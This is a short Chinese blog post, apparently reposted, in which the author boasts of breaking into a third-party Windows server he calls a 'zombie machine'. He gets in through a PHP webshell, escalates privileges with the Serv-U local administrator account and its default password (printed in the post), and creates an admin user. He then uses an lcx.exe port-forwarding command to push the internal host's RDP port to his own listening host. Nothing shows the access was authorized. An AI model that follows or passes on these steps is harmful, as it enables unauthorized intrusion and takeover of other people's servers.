| 关键词: 然后 端口 肉鸡 监听 用户 发下 定向 口重 3389 webshell |
老狼来也...今天真TMD郁闷.....不废话了......不知道哪里搞了个php的webshell,然后就想提权试试...这次入侵没有技术可言..就当复习好了......服务器是NT的装了apache,好像这个51shell加密后的phpspy也有权限了到它系统目录下面找到了my.ini.装了MYSQL的.然后用户是root密码是空.然后用php马的执行SQL功能连接它数据库试试,结果失败了.然后用这个php马自带的扫描工具扫描了一下.发下3306没开但是..开了21.和43958.ftp上去发现是低版本的...然后..这个phpspy已经有Serv-U EXP了....当然不用我上传ftp.exe了..提权就不用说了...就是利用Serv-U的本地用户localadministrator和它的默认密码#l@$ak#.lk;0@P然后就有administrator权限了....直接建立了用户230 login in.成功了..但是3389连不上....webshell里面ipconfig才发现它是内网服务器.......笨得我...............然后呢..当然是lcx大哥的lcx.exe了........哈哈.......端口重定向............上传上去lcx -slave 我的IP 监听的端口 肉鸡IP 3389这个命令就是把肉鸡的3389端口定向到我监听的端口.. |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|